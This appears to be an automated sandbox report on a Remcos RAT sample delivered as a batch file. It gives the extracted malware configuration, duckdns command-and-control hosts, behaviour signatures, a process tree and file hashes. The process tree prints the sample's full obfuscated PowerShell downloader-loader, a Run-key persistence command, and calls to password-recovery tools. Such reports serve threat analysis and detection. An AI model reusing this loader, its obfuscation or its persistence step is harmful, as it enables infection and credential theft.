Overview
overview
10Static
static
131032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
windows10-2004-x64
31032025_1...at.zip
windows10-ltsc_2021-x64
31032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
android-9-x86
31032025_1...at.zip
android-13-x64
31032025_1...at.zip
macos-10.15-amd64
31032025_1...at.zip
ubuntu-18.04-amd64
31032025_1...at.zip
debian-9-armhf
31032025_1...at.zip
debian-9-mips
31032025_1...at.zip
debian-9-mipsel
2025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-ltsc_2021-x64
82025.02.22...��.bat
windows11-21h2-x64
102025.02.22...��.bat
android-9-x86
2025.02.22...��.bat
android-13-x64
2025.02.22...��.bat
macos-10.15-amd64
2025.02.22...��.bat
ubuntu-18.04-amd64
2025.02.22...��.bat
debian-9-armhf
2025.02.22...��.bat
debian-9-mips
2025.02.22...��.bat
debian-9-mipsel
Analysis
-
max time kernel
119s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 15:20
Static task
static1
Behavioral task
behavioral1
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250313-en
Behavioral task
behavioral2
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral4
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250314-en
Behavioral task
behavioral5
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral6
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral7
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
macos-20241106-en
Behavioral task
behavioral8
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral9
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral10
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral11
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral12
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250313-en
Behavioral task
behavioral13
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral14
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win11-20250314-en
Behavioral task
behavioral16
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral17
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral18
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
macos-20241101-en
Behavioral task
behavioral19
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral21
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral22
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsel-20240729-en
General
-
Target
2025.02.222 n.ts შპს განსხვავებული.bat
-
Size
3KB
-
MD5
1db91aace1aac9f3e07036598aeaa98b
-
SHA1
c8f4074759f0ea7eef262c36163db7868c6503f7
-
SHA256
3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249
-
SHA512
9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4
Malware Config
Extracted
remcos
Sending
jamourtg6hansit1.duckdns.org:3980
jamourtg6hansit1.duckdns.org:3981
jamourtg6hansit2.duckdns.org:3980
jamourtg6hansit3.duckdns.org:3980
jamourtg6hansit4.duckdns.org:3980
jamourtg6hansit5.duckdns.org:3980
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
hjlbtisot.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
kmportsrgsd-ZX0BIK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 4 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral13/memory/1500-72-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral13/memory/2504-79-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral13/memory/1608-78-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral13/memory/1500-75-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral13/memory/1608-78-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral13/memory/1500-72-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView behavioral13/memory/1500-75-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 8 968 powershell.exe 47 4088 msiexec.exe 50 4088 msiexec.exe 61 4088 msiexec.exe 62 4088 msiexec.exe 64 4088 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 968 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Entrochus = "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\\Software\\Forlydes\\').GetValue('coxswains');%Reimburses% ($Frynsernes143)" reg.exe -
pid Process 5928 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4088 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5928 powershell.exe 4088 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4088 set thread context of 1500 4088 msiexec.exe 116 PID 4088 set thread context of 1608 4088 msiexec.exe 117 PID 4088 set thread context of 2504 4088 msiexec.exe 118 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 968 powershell.exe 968 powershell.exe 5928 powershell.exe 5928 powershell.exe 5928 powershell.exe 1500 recover.exe 1500 recover.exe 2504 recover.exe 2504 recover.exe 1500 recover.exe 1500 recover.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 5928 powershell.exe 4088 msiexec.exe 4088 msiexec.exe 4088 msiexec.exe 4088 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 5928 powershell.exe Token: SeDebugPrivilege 2504 recover.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4088 msiexec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 5744 wrote to memory of 968 5744 cmd.exe 89 PID 5744 wrote to memory of 968 5744 cmd.exe 89 PID 5928 wrote to memory of 4088 5928 powershell.exe 108 PID 5928 wrote to memory of 4088 5928 powershell.exe 108 PID 5928 wrote to memory of 4088 5928 powershell.exe 108 PID 5928 wrote to memory of 4088 5928 powershell.exe 108 PID 4088 wrote to memory of 556 4088 msiexec.exe 111 PID 4088 wrote to memory of 556 4088 msiexec.exe 111 PID 4088 wrote to memory of 556 4088 msiexec.exe 111 PID 556 wrote to memory of 5756 556 cmd.exe 113 PID 556 wrote to memory of 5756 556 cmd.exe 113 PID 556 wrote to memory of 5756 556 cmd.exe 113 PID 4088 wrote to memory of 4172 4088 msiexec.exe 115 PID 4088 wrote to memory of 4172 4088 msiexec.exe 115 PID 4088 wrote to memory of 4172 4088 msiexec.exe 115 PID 4088 wrote to memory of 1500 4088 msiexec.exe 116 PID 4088 wrote to memory of 1500 4088 msiexec.exe 116 PID 4088 wrote to memory of 1500 4088 msiexec.exe 116 PID 4088 wrote to memory of 1500 4088 msiexec.exe 116 PID 4088 wrote to memory of 1608 4088 msiexec.exe 117 PID 4088 wrote to memory of 1608 4088 msiexec.exe 117 PID 4088 wrote to memory of 1608 4088 msiexec.exe 117 PID 4088 wrote to memory of 1608 4088 msiexec.exe 117 PID 4088 wrote to memory of 2504 4088 msiexec.exe 118 PID 4088 wrote to memory of 2504 4088 msiexec.exe 118 PID 4088 wrote to memory of 2504 4088 msiexec.exe 118 PID 4088 wrote to memory of 2504 4088 msiexec.exe 118
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 21⤵
- Suspicious use of WriteProcessMemory
PID:5744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5928 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5756
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\buqtlzisxwejuym"3⤵PID:4172
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\buqtlzisxwejuym"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\dowmmrsutewnenarmck"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqbeekdnhmoagtxvvnxysx"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD551bb3f5f1869313e8951f821e70745b1
SHA1e44d1ac01abd1c147ea176e9ce780e34b0e208c6
SHA25682e75c7c7b5577f86fa4b8f8260c87812b559e4dbc90981e885d85a40b27e420
SHA5125f5c60c3c1634d9c4194999dcbd8fbf8936e4e6ca6ee96ca115296ec126f7c5ceaa27fe2446b50f92d229aae472f527d3447383ca927b24c3756302ab2f57436
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD56224ddef196ff48ffb281549ee916978
SHA14ff6cd8c27e1871f5b99202cb86f2afeb3632135
SHA2567482b7918512a8a68c393999a20163c0de6c9bdf52c2b69f4a12d4f37a76a60b
SHA5127a42f272806a8e6734f023cf9e5938173d628e4d62e32d77c203d54bd26ef8e529962eecd1670f78186531648dcab1caf524c1ae404dd077b234d5bc6fed0f84
-
Filesize
561KB
MD5fe566224082e2fd8765e323a73a2d9f2
SHA186a2fd4c14b36fc636efdfa6713ba3a3ae149937
SHA25652de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772
SHA5122c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886